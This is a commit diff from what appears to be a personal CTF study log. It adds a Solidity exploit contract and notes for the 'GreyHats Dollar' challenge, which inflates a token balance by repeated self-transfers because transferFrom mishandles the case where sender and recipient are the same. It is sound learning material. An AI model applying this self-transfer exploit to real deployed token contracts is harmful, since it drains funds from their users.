Add day24 of doublespending

Writeup/doublespending/day24/greyhats-dollar.sol

@@ -0,0 +1,31 @@
+// SPDX-License-Identifier: UNLICENSED
+pragma solidity 0.8.15;
+
+import { Setup } from "src/greyhats-dollar/Setup.sol";
+
+contract Exploit {
+    Setup setup;
+
+    constructor(Setup _setup) {
+        setup = _setup;
+    }
+
+    function solve() external {
+        // Claim 1000 GREY
+        setup.claim();
+
+        // Mint 1000 GHD using 1000 GREY
+        setup.grey().approve(address(setup.ghd()), 1000e18);
+        setup.ghd().mint(1000e18);
+
+        // Transfer GHD to ourselves until we have 50,000 GHD
+        uint256 balance = setup.ghd().balanceOf(address(this));
+        while (balance < 50_000e18) {
+            setup.ghd().transfer(address(this), balance);
+            balance = setup.ghd().balanceOf(address(this));
+        }
+
+        // Transfer all GHD to msg.sender
+        setup.ghd().transfer(msg.sender, balance);
+    }
+}

doublespending.md

@@ -356,4 +356,14 @@ B: [EthTaipei CTF 2023](https://github.com/dinngo/ETHTaipei-war-room/)(5)
       - We should find a way to distinguish the two sequential static call. - We can use `gasleft()`
       - We can find a value `i` - `gasleft() % i == 0` in the first call - `gasleft() % i != 0` in the second call
 
+### 2024.09.21
+
+B: [Grey Cat the Flag 2024 Milotruck challs](https://github.com/MiloTruck/evm-ctf-challenges) (6)
+
+- GreyHats Dollar
+  - The share finally updates at this [line](https://github.com/MiloTruck/evm-ctf-challenges/blob/a385836e1e83543b06ff3b8108cf962f4d74a49d/src/greyhats-dollar/GHD.sol#L133)
+  - `transferFrom` has not consider the case that `from` equals to `to`.
+    - At this case, we get [`shares[to=from] = origin + _shares`](https://github.com/MiloTruck/evm-ctf-challenges/blob/a385836e1e83543b06ff3b8108cf962f4d74a49d/src/greyhats-dollar/GHD.sol#L133)
+    - However, the share is expected unchanged.
+
 <!-- Content_END -->